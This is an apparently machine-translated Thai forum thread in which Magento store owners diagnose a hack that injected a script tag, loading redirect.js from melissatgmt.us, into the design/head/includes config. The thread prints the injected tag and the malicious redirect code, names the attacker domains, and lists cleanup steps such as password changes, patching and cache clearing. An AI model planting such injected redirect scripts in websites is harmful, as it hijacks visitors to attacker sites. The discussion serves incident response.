เว็บไซต์เริ่มเปลี่ยนเส้นทางไปยัง URL อื่น

Maybe it's infected by some virus.

เว็บไซต์ของฉันเริ่มเปลี่ยนเส้นทางไปยัง URL ที่ติดเชื้อเหล่านี้

http://mon.setsu.xyz
และบางครั้งhttps://tiphainemollard.us/index/?1371499155545
ลิงก์ที่ติดเชื้อ

สิ่งที่ฉันทำเพื่อแก้ไข

1. แสดงความคิดเห็นไฟล์. htaccess (ไม่มีอะไรเกิดขึ้น)
2. โฟลเดอร์รวมความคิดเห็น(ไม่มีอะไรเกิดขึ้น)
3. การสแกนเซิร์ฟเวอร์ที่สมบูรณ์(ไม่มีอะไรเกิดขึ้นไม่พบมัลแวร์ไวรัส)
4. เปลี่ยน CSS, สื่อและเส้นทาง js จากฐานข้อมูลเพียงเพื่อให้แน่ใจว่าสภาพอากาศของ PHP หรือ js ใด ๆ ที่กำลังทำอยู่(ไม่มีอะไรเกิดขึ้น)
5. select * from core_config_data where path like '%secure%';ลิงก์ทั้งหมดได้รับการ อัปเดต

ฉัน googled และมีบทความมากมายที่เขียนเกี่ยวกับเรื่องนี้ แต่พวกเขาแนะนำว่ามันเป็นปัญหาของเบราว์เซอร์หรือระบบของฉันติดเชื้อ บทความเกี่ยวกับเรื่องนี้ แม้ว่าฉันจะเปิดไซต์บนโทรศัพท์หรือแล็ปท็อปส่วนตัวของฉันปัญหาก็เหมือนกัน

อัพเดท 2

ฉันพบแถวในฐานข้อมูลที่ได้รับผลกระทบ (ตามที่ Boris K. พูดด้วย)

ใน ค่าcore_config_data ตาราง design/head/includesมี

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

ซึ่งจะถูกแทรกในส่วนหัวในการโหลดหน้า

หากคุณไปที่ URL ข้างต้นคุณจะได้รับสคริปต์การเปลี่ยนเส้นทางซึ่งก็คือ

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

เว็บไซต์ลูกค้าทำงานจากช่วงบ่ายเมื่อฉันลบสคริปต์นั้น But the main problem is how that script inserted into the database.

แพทช์หนึ่งนั้นล้าสมัยแล้วดังนั้นฉันก็อัพเดตแพตช์นั้นด้วย

ปรับปรุง 3 ไซต์ติดไวรัสอีกครั้ง นี่คือสคริปต์ที่แทรกในส่วนผู้ดูแลระบบ ( Admin-> Configuration-> General-> Design-> HTML Head-> สคริปต์เบ็ดเตล็ด )

และในคอลัมน์ฐานข้อมูล

ฉันไม่รู้จะทำยังไง เมื่อฉันเปลี่ยนรหัสผ่านทุกครั้งลบผู้ใช้เก่าทั้งหมด

อัพเดท 3

จนถึงขณะนี้ข้อผิดพลาดไม่ได้เกิดขึ้นดังนั้นโดยการทำตามขั้นตอนข้างต้นเราสามารถเอาชนะปัญหานี้ได้

ปรับปรุง :: 4 ติดตั้งแพทช์เสมอเพราะมันช่วยฉันในโครงการเพื่อให้ร้านค้ามีแนวโน้มน้อยลงสำหรับปัญหาประเภทนี้และแพตช์มีความสำคัญเช่นกัน หนึ่งสามารถใช้https://magescan.com/เพื่อตรวจสอบปัญหาในเว็บไซต์ของพวกเขา

ฉันพบรหัสที่ฉีดในcore_config_dataตารางด้านdesign/head/includesล่าง ลบออกและตอนนี้เว็บไซต์จะกลับมาเป็นปกติ

UPDATE: ดังที่ทุกคนพูดถึงมันเกิดขึ้นอีกครั้งเมื่อเช้านี้ เวลานี้ผมได้กำจัดมันได้อย่างง่ายดายมากขึ้นจาก Admin Panel System > Configuration > General > Design > HTML Head > Miscellaneous Scriptsภายใต้ นี่เป็นช่องโหว่ที่ใหญ่มากฉันหวังว่า Magento กำลังทำงานกับโปรแกรมแก้ไข

อัปเดต 2:สคริปต์กลับมาอีกครั้งดังนั้นฉันจึงเปลี่ยนรหัสผ่าน db ล้างแคช ประมาณหนึ่งชั่วโมงต่อมาสคริปต์จะกลับมา ดังนั้นฉันไม่คิดว่ามันจะถูกเพิ่มผ่านฐานข้อมูล ฉันเพิ่งเปลี่ยนรหัสผ่านผู้ดูแลระบบของฉันลองดูว่ามันจะกลับมาอีกครั้ง

อัปเดต 3:ตั้งแต่ฉันเปลี่ยนรหัสผ่านผู้ดูแลระบบเมื่อวานนี้ในเว็บไซต์ที่ได้รับผลกระทบทั้งสองของฉันประมาณ 24 ชั่วโมงต่อมาทั้งคู่ก็ยังสะอาดอยู่

ปัญหาเดียวกันในเว็บไซต์วีโอไอพีอื่น ฉันค้นพบว่าสคริปต์ถูกฉีดในส่วน HEAD ของหน้าเว็บขอให้ redirect_base / redirect.js จาก melissatgmt.us (เปลี่ยนไปเป็นโดเมนอื่น) แต่ไม่สามารถหาวิธีฉีดอึนี้ได้

อัปเดต : ตามที่ผู้อื่นกล่าวถึงพบรายการในตาราง core_config_data และลบออก แต่บันทึกกลับมาที่หน้าถัดไปโหลดใหม่ ฉันเปลี่ยนรหัสผ่าน db และตอนนี้ดูเหมือนว่าจะพ่ายแพ้ ฉันไม่แน่ใจว่าการเปลี่ยนรหัสผ่านเป็นทางออกที่ดีที่สุด แต่เป็นการปรับปรุงความปลอดภัย

ปรับปรุง 2 : ตามที่ระบุไว้โดย Jix Sas การเข้าถึงจากการกำหนดค่าในการดูแลระบบวีโอไอพีเป็นวิธีที่ง่ายกว่าการเข้าถึงตารางฐานข้อมูลโดยตรง แต่อึกลับมาทุก ๆ 10/15 นาที

อัปเดต 3 : เปลี่ยนรหัสผ่านของผู้ดูแลตรวจสอบและบันทึกหน้าบาง cms (บริการลูกค้าและเกี่ยวกับเรา) ที่ดูเหมือนว่าติดเชื้อแคชที่ถูกปิดใช้งานแคชที่ทำความสะอาดหลายครั้ง (หลังจากตรวจสอบทุกครั้ง มีการฉีดสคริปต์เพิ่มขึ้นในช่วง 8 ชั่วโมงที่ผ่านมา

ฉันเปลี่ยนพา ธ ไปที่พาเนลผู้ดูแลระบบapp/etc/local.xmlและจะช่วย สคริปต์จะไม่ถูกเพิ่มเข้าไปdesign/head/includesอีก

คำอธิบาย:

ในapp/etc/local.xmlฉันเปลี่ยน<admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>ก่อนหน้านี้มันเป็น sitedomain.com/adminและตอนนี้เส้นทางไปยังแผงผู้ดูแลระบบจะเป็น sitedomain.com/new_admin_path

นี่คือการบรรเทาครั้งใหญ่ฉันได้คืนค่าไซต์ของฉัน 10 ครั้งตั้งแต่เช้า

ข้อผิดพลาดยังคงมาอีกครั้งและอีกครั้ง

ทางออกที่ดีที่สุดคืออะไร?

เปลี่ยนรหัสผ่าน DB หรือไม่ เปลี่ยนรหัสผ่านรูทหรือไม่ แพทช์ใด ๆ ที่วางจำหน่าย?

ฉันไม่แน่ใจว่าสิ่งนี้เกี่ยวข้องหรือไม่ฉันได้รับอีเมลด้านล่างจาก Security Consultancy

ถึงคุณหรือคุณนาย,

เราคือ Hatimeria บริษัท พัฒนาวีโอไอพีซึ่งตั้งอยู่ในประเทศสวิตเซอร์แลนด์โปแลนด์และเนเธอร์แลนด์

เมื่อเร็ว ๆ นี้เราเริ่มทำงานกับลูกค้าใหม่และเข้ายึดเซิร์ฟเวอร์เก่าของเขา ในขณะที่เราเข้าถึงเซิร์ฟเวอร์เราพบมัลแวร์บางตัวซึ่งแฮกเกอร์สามารถใช้เซิร์ฟเวอร์ของลูกค้าและใช้เป็น "เครื่องแฮกเกอร์" เพื่อแฮ็คเว็บไซต์อื่น ๆ แน่นอนลูกค้าไม่ทราบว่าสิ่งนี้เกิดขึ้นบนเซิร์ฟเวอร์ของเขา

เราพบข้อมูลรับรองฐานข้อมูลของเว็บไซต์ของคุณซึ่งถูกแฮกผ่านเซิร์ฟเวอร์นั้น แน่นอนว่าเราจะไม่ทำอะไรกับมัน แต่ฉันรู้สึกว่าต้องติดต่อคุณและแจ้งให้คุณทราบว่าเกิดอะไรขึ้น แฮ็คทำผ่านช่องโหว่ Magento Cacheleak ซึ่งอาจยังอยู่ในร้านของคุณตอนนี้

ฉันแนะนำให้คุณดูแลช่องโหว่นั้นทันทีและเปลี่ยนรหัสผ่านฐานข้อมูลของคุณ ช่างของเราบอกว่าใช้เวลาประมาณ 30 นาที

บนเว็บไซต์ MageReport คุณสามารถดูว่าเว็บไซต์ของคุณอาจมีช่องโหว่อะไร: https://www.magereport.com/scan/?s=

ความตั้งใจหลักของฉันสำหรับอีเมลฉบับนี้ไม่ใช่เพื่อให้ได้มาซึ่งลูกค้า แต่หากคุณต้องการความช่วยเหลือในการรักษาความปลอดภัยร้านค้าของคุณหรือมีคำถามอื่น ๆ เรายินดีให้ความช่วยเหลือ

ด้วยความนับถือโธมัสแทนเนอร์

ดังนั้นฉันเดาทางออกคือเปลี่ยนรหัสผ่านฐานข้อมูล

เราต้องเข้าใจว่าอะไรคือสาเหตุหลักของการฉีดสแปมดังกล่าว

หากเว็บไซต์ของคุณถูกฉีดกรุณาตรวจสอบเว็บไซต์ของคุณเกี่ยวกับการสแกนมัลแวร์ทั้งสาม

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

ฉันรู้สึกว่านี่เป็นเพราะแพตช์รักษาความปลอดภัยหายไป! หากคุณเห็นแพตช์หายไปให้รายงานภายใต้หัวข้อนี้

1. เปลี่ยนรหัสผ่านการเข้าถึงโฮสติ้งเปลี่ยนรหัสผ่านฐานข้อมูลเปลี่ยนรหัสผ่านการเข้าสู่ระบบของผู้ดูแลระบบ ซ่อนและดาวน์โหลด URL และซ่อน / RSS / จากมุมมองสาธารณะ

2. ทำการสแกนไวรัสของไซต์แบบเต็มผู้ให้บริการโฮสต์ของคุณสามารถสแกนไซต์ได้หากคุณไม่สามารถทำได้ด้วยตนเอง

3. ไปที่ Sysytem -> ผู้ใช้และดูว่ามีผู้ใช้ที่ลงทะเบียน UNAUTHORIZED ในบัญชีหรือไม่

ฉันแก้ไขปัญหาแล้ว แม้หลังจากที่ฉันลบไฟล์ fhis จาก<script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>จากcore_config_dataตารางในdesign/head/includesค่า มันไม่ได้แก้ปัญหา รหัสสคริปต์ถูกแทรกอีกครั้งและอีกครั้ง หากต้องการแก้ไขปัญหาเพียงทำตามสามขั้นตอนเหล่านี้

1. ลบรหัสสคริปต์จากตารางในcore_config_datadesign/head/includes
2. เปลี่ยนรหัสผ่านฐานข้อมูลรวมถึงapp/etc/local.xmlหนังสือรับรอง
3. ล้างแคชที่รูทโฟลเดอร์ Magento โดยใช้คำสั่งนี้ rm -rf var/cache/*

ปล. ฉันใช้เวลาทั้งวัน หวังว่าจะได้ผลสำหรับคุณ และทำการสำรองไฟล์ตลอดเวลา

สิ่งเดียวกันนี้เกิดขึ้นกับฉันในวันนี้! เปลี่ยนเส้นทางไปยังเว็บไซต์เดียวกัน อย่างไรก็ตามฉันพบสคริปต์ในแผงผู้ดูแลระบบ Magento ภายใต้การกำหนดค่า> การออกแบบ> html head> misc สคริปต์ มีสคริปต์นี้: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> ฉันลบมันออกจากที่นั่นและเว็บไซต์ทำงานได้ดี ฉันไม่มีโฟลเดอร์ที่คุณบอกว่าคุณพบสคริปต์มาความคิดใดที่จะเป็นไปได้ (ตามที่คุณทราบเส้นทางไปยังส่วนหัวของ HTML> สคริปต์อื่น ๆ )

นอกจากนี้คุณทำอะไรเมื่อเร็ว ๆ นี้? บางทีเราสามารถหาสาเหตุได้ สำหรับฉันฉันติดตั้งป๊อปอัพจดหมายข่าวฟรีซึ่งอาจเป็นสาเหตุ แล้วคุณล่ะ?

UPDATE:ตอนนี้สคริปต์กลับมาแล้ว มีคนบอกฉันว่าฉันจะเข้าถึงสคริปต์นี้จากฐานข้อมูลเพื่อลบออกได้อย่างไร

UPDATE 2:ตามที่ระบุโดย Mark การลบสคริปต์และการเปลี่ยนรหัสผ่านฐานข้อมูลหยุดสคริปต์นี้ไม่ให้กลับมา หากใครรู้ชื่อของช่องโหว่นี้หรือหากมีอันตรายต่อการชำระเงินของลูกค้าโปรดแจ้งให้เราทราบ